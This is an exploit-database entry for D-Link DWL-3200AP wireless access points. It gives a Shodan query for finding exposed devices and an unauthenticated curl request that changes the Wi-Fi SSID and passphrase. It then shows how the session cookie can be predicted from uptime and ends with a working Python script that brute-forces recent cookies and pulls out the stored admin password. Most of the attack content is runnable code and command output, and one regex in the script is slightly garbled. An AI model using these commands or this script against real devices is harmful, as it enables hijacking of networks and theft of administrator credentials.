ID

VAR-E-201407-0479


TITLE

D-Link AP 3200 Missing Authentication / Cleartext Secret Storage

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DESCRIPTION

D-Link AP 3200 fails to authenticate requests to wireless settings, stores credentials in plaintext, and uses a weak cookie value.

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AFFECTED PRODUCTS

vendor:d linkmodel:apscope:eqversion:3200

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EXPLOIT

# Exploit Title: D-Link AP 3200 Multiple Vulnerabilities
# Date: 29/07/2014
# Exploit Author: pws
# Vendor Homepage: http://www.dlink.com/
# Firmware Link: http://ftp.dlink.ru/pub/Wireless/DWL-3200AP/Firmware/
# Tested on: Latest version
# Shodan d0rk: "Server: Allegro-Software-RomPager/4.06" ~12000 devices
# CVE : None yet

Those vulnerabilities have only been tested on the D-Link AP 3200 serie but
other series (8600, 7700, 2700, ..) might also be vulnerable.


1. Unauthenticated request to change Wireless settings

To do so, you just need to craft a specific POST Request:

$ curl 'http://192.168.50.3/Forms/FormCfgWireless?1,0,6' --data 'ApModeMenu=Access+Point&Ssid=MyPrivateNetwork&SsidBroadcast=Enable&AutoChannelScan=on&AuthMenu=WPA2-Personal&Cipher=AUTO&WPA_GroupKeyUpdateInterval=1800&passphrase=OMGWTFBBQ&Preapply=0&toReboot=0&hide=0' -D -

HTTP/1.1 303 See Other
Location: http://192.168.50.3/html/bWirelessSetting.htm?1,0,6
Content-Length: 0
Server: Allegro-Software-RomPager/4.06

ESSID will be: MyPrivateNetwork
Passphrase will be: OMGWTFBBQ

Other actions might also be vulnerable but this one was the most critical.
Moreover, those requests can lead to CSRF attacks (to target internal devices).


2. Credentials in plaintext

Passwords are stored in plaintext in the device.
This can be verified by (after logging in) going to administration page: /html/tUserAccountControl.htm .
Fields (Old && New && Confirm New) password are already filled.


3. Weak cookie value (RpWebID)

The cookie value generated is nothing more than the uptime of the AP.
Here is the output between two requests (delay between requests: 1sec):

$ curl http://192.168.50.3
<html><head>
<script src="jsMain.js"> </script>
<title>DWL-3200AP</title></head>


<script language='JavaScript'>
document.cookie = 'RpWebID=3c27a451';
</script>
<script language='JavaScript'>
function JumpToHmain(){location.replace('/html/index.htm');}window.setTimeout('JumpToHmain()',1);</script>


$ curl http://192.168.50.3
<html><head>
<script src="jsMain.js"> </script>
<title>DWL-3200AP</title></head>


<script language='JavaScript'>
document.cookie = 'RpWebID=3c27a452';
</script>
<script language='JavaScript'>
function JumpToHmain(){location.replace('/html/index.htm');}window.setTimeout('JumpToHmain()',1);</script>


4. PoC Time!

Basically, this code extracts the cookie value and decrement it to try all combinations from the last hour. (3600 values)
If there's one valid, it recovers the password from the AP.
I added some (horrible) 'trick' to not stress the network 'too much', but we said PoC, right?

# Example of usage
# $ python poc.py
# Cookie value extracted: 3c27acbb
# [+] Cookie: 3c27acae valid !
# [+] Password of AP is: admin123

import threading
import requests
import sys
import re
import time
import HTMLParser

# replace it with your target
url = "http://192.168.50.3/"

def test_valid_cookie(cookie_val):
cookies = dict(RpWebID=cookie_val)
try:
req = requests.get('%shtml/tUserAccountControl.htm' % (url), cookies=cookies, timeout=10)
pattern = r"NAME=\"OldPwd\" SIZE=\"12\" MAXLENGTH=\"12\" VALUE=\"([�-9]+)\""
if ('NAME="OldPwd"' in req.content):
print '[+] Cookie: %s valid !' % (cookie_val)
h = HTMLParser.HTMLParser()
password = re.findall(pattern, req.content)[0].replace('&', ';&')[1:] + ";"
print '[+] Password of AP is: %s' % h.unescape(password)
except:
# print "[!] Error while connecting to the host"
sys.exit(-1)


def get_cookie_value():
pattern = "RpWebID=([a-z0-9]{8})"
try:
req = requests.get(url, timeout=3)
regex = re.search(pattern, req.content)
if (regex is None):
print "[!] Unable to retrieve cookie in HTTP response"
sys.exit(-1)
else:
return regex.group(1)
except:
print "[!] Error while connecting to the host"
sys.exit(-1)

cookie_val = get_cookie_value()
print "Cookie value extracted: %s" % (cookie_val)

start = int(cookie_val, 16) - 3600 # less than one hour
cookie_val = int(cookie_val, 16)

counter = 0
for i in xrange(cookie_val, start, -1):
if (counter >= 350):
time.sleep(3)
counter = 0
b = threading.Thread(None, test_valid_cookie, None, (format(i, 'x'),))
b.start()
counter = counter + 1

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EXPLOIT HASH

LOCAL

SOURCE

md5: 7d9047200b9cca205e9095fa5df013ca
sha-1: 02ccec63f2f2d314bd024968c00ccde6a51f4c79
sha-256: 1adee944461c867636ad8a7e90a9b0c101706ca73b2f762045ec1d3ca7ba4e09
md5: 7d9047200b9cca205e9095fa5df013ca

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PRICE

free

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TYPE

bypass, info disclosure

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TAGS

tag:exploit

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tag:bypass

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tag:info disclosure

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CREDITS

pws

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EXTERNAL IDS

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SOURCES

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LAST UPDATE DATE

2022-07-27T09:27:25.499000+00:00


SOURCES RELEASE DATE

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